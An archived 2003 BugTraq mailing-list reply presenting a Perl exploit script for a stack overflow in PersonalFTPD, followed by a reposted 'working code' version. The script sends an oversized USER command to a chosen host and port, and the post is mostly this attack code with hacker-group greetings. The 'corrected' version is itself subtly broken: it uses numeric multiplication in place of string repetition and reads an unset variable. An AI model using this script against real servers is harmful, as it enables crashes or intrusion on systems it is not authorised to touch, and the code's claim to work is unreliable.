BugTraq
Re: Remote Stack Overflow exploit for Personal FTPD May 08 2003 05:25PM
subj (r2subj3ct dwclan org)
In-Reply-To: <20030508081123.13047.qmail (at) www.securityfocus (dot) com [email concealed]>

>Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000

>Received: from outgoing2.securityfocus.com (205.206.231.26)

> by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000

>Received: from lists.securityfocus.com (lists.securityfocus.com

[205.206.231.19])

> by outgoing2.securityfocus.com (Postfix) with QMQP

> id ED2648F2D9; Thu, 8 May 2003 08:19:59 -0600 (MDT)

>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm

>Precedence: bulk

>List-Id: <bugtraq.list-id.securityfocus.com>

>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>

>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>

>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>

>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>

>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]

>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]

>Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000

>Date: 8 May 2003 08:11:23 -0000

>Message-ID: <20030508081123.13047.qmail (at) www.securityfocus (dot) com [email concealed]>

>Content-Type: text/plain

>Content-Disposition: inline

>Content-Transfer-Encoding: binary

>MIME-Version: 1.0

>X-Mailer: MIME-tools 5.411 (Entity 5.404)

>From: subj <r2subj3ct (at) dwclan (dot) org [email concealed]>

>To: bugtraq (at) securityfocus (dot) com [email concealed]

>Subject: Remote Stack Overflow exploit for Personal FTPD

>

>

>

>#!/usr/bin/perl

>use IO::Socket;

>

>##########################################################

># #

># Remote Stack Overflow sploit for PersonalFTPD #

># If wanna talk with me find me on irc #

># irc.irochka.net #dwc, #global, #phreack #

># ###################################################### #

># thanx to kabuto, drG4njubas, fnq #

># gr33tz to dhg, gipshack, rsteam, blacktigerz #

># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #

># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #

># ###################################################### #

># Vulnerability links: #

># http://security.nnov.ru/search/document.asp?docid=4309 #

># http://www.securityfocus.com/archive/1/316958 #

># #

>##########################################################

>

>$data = "A";

>

>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";

>print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";

>print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";

>print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";

>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

>

>$count_param=@ARGV;

>$n="0";

>if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer

>size\n\n"; exit; }

>while ($n<$count_param) {

>if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}

>if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}

>if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}

>$n++;

>}

>&connect;

>

>sub connect

>{

>$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort

=> "$port",

>Proto => "tcp")

> || die "Can\'t connect to $server port $port\n";

>print $sock "USER $buffer\n";

>print "Buffer has beens sended...";

>

>}

>

>

>close($sock);

>exit;

>

------------------------------------------------------------------------
--

I bring the apologies, has laid out not working version, simply was

mistaken a file, before $sock it is necessary to add $buffer. = $data *

$bsize;

Working code

#!/usr/bin/perl

use IO::Socket;

##########################################################

# #

# Remote Stack Overflow sploit for PersonalFTPD #

# If wanna talk with me find me on irc #

# irc.irochka.net #dwc, #global, #phreack #

# ###################################################### #

# thanx to kabuto, drG4njubas, fnq #

# gr33tz to dhg, gipshack, rsteam, blacktigerz #

# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #

# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #

# ###################################################### #

# Vulnerability links: #

# http://security.nnov.ru/search/document.asp?docid=4309 #

# http://www.securityfocus.com/archive/1/316958 #

# #

##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";

print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";

print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";

print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;

$n="0";

if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer

size\n\n"; exit; }

while ($n<$count_param) {

if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}

if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}

if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}

$n++;

}

&connect;

sub connect

{

$buffer.= $data * $bsize;

$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",

Proto => "tcp")

|| die "Can\'t connect to $server port $port\n";

print $sock "USER $buffer\n";

print "Buffer has beens sended...";

}

close($sock);

exit;

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus